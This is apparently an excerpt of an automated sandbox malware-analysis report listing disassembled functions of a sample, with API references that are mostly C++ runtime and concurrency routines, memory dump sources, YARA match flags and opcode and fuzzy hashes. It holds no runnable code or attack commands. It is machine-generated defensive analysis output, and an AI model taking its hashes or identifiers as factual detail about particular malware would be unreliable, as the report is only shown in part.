                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction ID: ab5a82a05ff0c39401192e058ce0ba7530737879e959cf2d24eec9387fa65bb0
                                                      • Opcode Fuzzy Hash: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction Fuzzy Hash: F311AC32D00228ABEF25EFA0C800AED77A4AF54719F14451DE512AB290FB75BA05C799
                                                      Function 0040C19F Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1B0
                                                      • int.LIBCPMT ref: 0040C1C7
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040C1D0
                                                      • std::_Facet_Register.LIBCPMT ref: 0040C201
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C217
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C235
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction ID: 6b19aca16b5ee2806017c598a5a39285e5846dd85c5abd501d9917ceab81d603
                                                      • Opcode Fuzzy Hash: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction Fuzzy Hash: E5117031D00219DBCB14EBE1D881AED7764AF54319F10053FE816BB2D2DB7C9A04CBA9
                                                      Function 004054E8 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004054F9
                                                      • int.LIBCPMT ref: 00405510
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00405519
                                                      • std::_Facet_Register.LIBCPMT ref: 0040554A
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00405560
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040557E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: b413353ca2cb88eb9f67ed3830c99794481aa72321bd8bdc3f632fee9d19e997
                                                      • Instruction ID: 51f3cbdd7a3cb2d943171398e4bd9eec0edb2b0c3dc28ea11f947fcb10585dfd
                                                      • Opcode Fuzzy Hash: b413353ca2cb88eb9f67ed3830c99794481aa72321bd8bdc3f632fee9d19e997
                                                      • Instruction Fuzzy Hash: 3411A032D00618ABCB10EBA5CC41AAE7770EF44319F14053EE411BB2D2EB3C9E04CB98
                                                      Function 00405584 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00405595
                                                      • int.LIBCPMT ref: 004055AC
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 004055B5
                                                      • std::_Facet_Register.LIBCPMT ref: 004055E6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004055FC
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040561A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 253da7def748f873aa858a5abf55e007f795de8dc7edc342c631e395e77fcb7b
                                                      • Instruction ID: 8bd0dacbe2200d0edaf670a3e4ad6e2c10e3f5b07ea158c040a2e50667d2dda9
                                                      • Opcode Fuzzy Hash: 253da7def748f873aa858a5abf55e007f795de8dc7edc342c631e395e77fcb7b
                                                      • Instruction Fuzzy Hash: D8115E719006199ACB14EBA1D841AAE7775EF44315F14053FE812BB2D2DB7C9A05CB9C
                                                      Function 00404C2A Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C3B
                                                      • int.LIBCPMT ref: 00404C52
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C5B
                                                      • std::_Facet_Register.LIBCPMT ref: 00404C8C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CA2
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction ID: c9b89b989855d4c571325bf02331e014af237f7f7f330d53573bd89ddfaab51b
                                                      • Opcode Fuzzy Hash: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction Fuzzy Hash: 0B118271D002299BCB14EBA1C845AEE7774AF84319F11053FE515BB2D2DB7C9E04CB99
                                                      Function 046DC406 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046DC417
                                                      • int.LIBCPMT ref: 046DC42E
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046DC437
                                                      • std::_Facet_Register.LIBCPMT ref: 046DC468
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046DC47E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046DC49C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction ID: 0bdf51463c87e281c8c6c6b190bead12f1b841e9496c83f756da9fefdb28b38c
                                                      • Opcode Fuzzy Hash: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction Fuzzy Hash: D6118B72D0022DABEB15EBA4C840AFD7764AF44718F24451DE512BB290FF74AA01C7A9
                                                      Function 046D4E91 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046D4EA2
                                                      • int.LIBCPMT ref: 046D4EB9
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046D4EC2
                                                      • std::_Facet_Register.LIBCPMT ref: 046D4EF3
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046D4F09
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046D4F27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction ID: 04ebbb4c7a2079464db03613354312b8b74ff91b9ab583cdfef103c37f0eb4ab
                                                      • Opcode Fuzzy Hash: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction Fuzzy Hash: 8A11A172D00229ABEF25EFA0C840AED77B4AF94719F14051DE511AB2A0FF74BE00C799
                                                      Function 046F8947 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 046F897A
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 046F8A33
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: "1@$0fB$csm
                                                      • API String ID: 3480331319-3151313498
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: 06c3bfcb457ba7c5b8f7ee052020dd0d4de7bd4b15a17621a175367a85838f28
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: 4341C630A00208ABCF10EF6CCC45A9E7BB5FF4532CF1481A5EA956B391E736B955CB91
                                                      Function 004236FF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetEvent.KERNEL32(?,00000000), ref: 00423749
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423731
                                                        • Part of subcall function 0041B73C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B75D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042377A
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                      • String ID: "1@
                                                      • API String ID: 2630251706-1946750398
                                                      • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                      • Instruction ID: 26d67dbd1ca29f509460887b03f845c7b7553e0c5ff7feafc1e4fad03756b5e5
                                                      • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                      • Instruction Fuzzy Hash: B9110B747002106BCF04AF25DC85DAE7779EB84761B10407BFA06D7392CBBC9D41CA98
                                                      Function 00404E79 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E80
                                                        • Part of subcall function 0040BB5D: __EH_prolog3_GS.LIBCMT ref: 0040BB64
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404ECB
                                                      • __Getcoll.LIBCPMT ref: 00404EDA
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID: |J@
                                                      • API String ID: 1836011271-3739266617
                                                      • Opcode ID: 15df9f408afb62f81537008e8a835d3397b07670a6045ba689dee2ca7154d090
                                                      • Instruction ID: c20a3fbba19ef514f93e81f5f78b79826858263dd1e821b9b3bc98d3226dc2c7
                                                      • Opcode Fuzzy Hash: 15df9f408afb62f81537008e8a835d3397b07670a6045ba689dee2ca7154d090
                                                      • Instruction Fuzzy Hash: 67016971910209EFDB10EFA5D441B9DB7B0BF44319F10853EE455BB6C2CB789544CB99
                                                      Function 0041CE1D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE31
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE55
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE68
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 3657713681-923244539
                                                      • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction ID: c60aa93a39525c790efe6095f81eaebe2eb2d525de7270d8979a73265dec8ac3
                                                      • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction Fuzzy Hash: 6FF05931940708A7C724F745DC928DEB3799E91B18760812FE44663282DB3CA98AC69D
                                                      Function 0041E62D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E64F
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E662
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E670
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@$pContext
                                                      • API String ID: 1990795212-994062807
                                                      • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction ID: 8fdd528e8ddf74d56289c82c300dd76b8c64187c2a6bd7ebcd67f626c0161db6
                                                      • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction Fuzzy Hash: FCE0D139B0011457CB04F769DC06C5DB7A9EED0714754406BF915A3341DFBCA905C5D8
                                                      Function 00411EA8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 00411EAC
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411143
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041117A
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411186
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EB8
                                                        • Part of subcall function 00410A93: Concurrency::critical_section::unlock.LIBCMT ref: 00410AB7
                                                      • Concurrency::Context::Block.LIBCONCRT ref: 00411EBD
                                                        • Part of subcall function 00412C71: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C73
                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EDD
                                                        • Part of subcall function 0041104B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411059
                                                        • Part of subcall function 0041104B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411066
                                                        • Part of subcall function 0041104B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411071
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                      • String ID: "1@
                                                      • API String ID: 3659872527-1946750398
                                                      • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction ID: 469d0f8320c442117f3d3686e23671eaf8242e5923029cf1daa93514d1604d3f
                                                      • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction Fuzzy Hash: 53E0D8345005025BCB04FB21C4515DCFB617F95314B10421EE462032E1CF7C5D86CB88
                                                      Function 046E210F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 046E2113
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 046E13AA
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 046E13E1
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 046E13ED
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 046E211F
                                                        • Part of subcall function 046E0CFA: Concurrency::critical_section::unlock.LIBCMT ref: 046E0D1E
                                                      • Concurrency::Context::Block.LIBCONCRT ref: 046E2124
                                                        • Part of subcall function 046E2ED8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 046E2EDA
                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 046E2144
                                                        • Part of subcall function 046E12B2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E12C0
                                                        • Part of subcall function 046E12B2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E12CD
                                                        • Part of subcall function 046E12B2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 046E12D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                      • String ID: "1@
                                                      • API String ID: 3659872527-1946750398
                                                      • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction ID: dc56649033674a39e7bd60be7073ff85be17b9c92b7c7dd7ebf3f6486bc298d8
                                                      • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction Fuzzy Hash: 99E01A355025169BDB08FB21C8605ACBBA2BF85314B14424994A6472E0EF747A86DB89
                                                      Function 0042B116 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                      • Instruction ID: 5a01cb2bda703cc323e430b932663db35aaad4c657ba87df4bbdda35476bab91
                                                      • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                      • Instruction Fuzzy Hash: F0719031B00266DBCB21CF95E884ABFBB75FF41360B98426BE81197290DB749D41C7E9
                                                      Function 046FB37D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction ID: 6561c049650afe59ae27dcdb076abca19cbc93dda18cc07458b692b79cd831c7
                                                      • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction Fuzzy Hash: E171C775A002169BDB21CF58CC84ABFBB76FF55B10F144229E691A7290F774BD41CBA0
                                                      Function 00430A54 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      • _free.LIBCMT ref: 00430B5F
                                                      • _free.LIBCMT ref: 00430B76
                                                      • _free.LIBCMT ref: 00430B95
                                                      • _free.LIBCMT ref: 00430BB0
                                                      • _free.LIBCMT ref: 00430BC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                      • Instruction ID: fa2a1e89913973176317e453863384d053ae921997245dbad48486a05003b7a1
                                                      • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                      • Instruction Fuzzy Hash: 3B51B031A00304ABEB21DF6AD851B6BB7F4EF5C724F14566EE849D7250E739AD01CB88
                                                      Function 04700CBB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction ID: 9e8cb1c851769d2d730dc6f30a3eb081331b4446ee16b3edc123c8ed33b9d615
                                                      • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction Fuzzy Hash: 9251B331A02604EFEB24DF29DC41B6AB7F4EF49724B148669E909D7390E732F901CB50
                                                      Function 004314EB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction ID: fa493c7e594dd2a8188879d4ef0b4437eabdb6594d260daff420ade158477668
                                                      • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction Fuzzy Hash: DB41E632A00304AFCB20DF79C981A5AB7B5EF89714F15816AE516EB391DB35ED01CB85
                                                      Function 04701752 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction ID: 635d86e9bff84fbc1bcee5cf9abe1ce2424f76cc9841d658fc271c55971e736a
                                                      • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction Fuzzy Hash: 3E41BE36A01204DFDB24DF78C880A6AB7F5EF85714B5585A9D915EB3C1EB32BA01CB80
                                                      Function 004368AD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
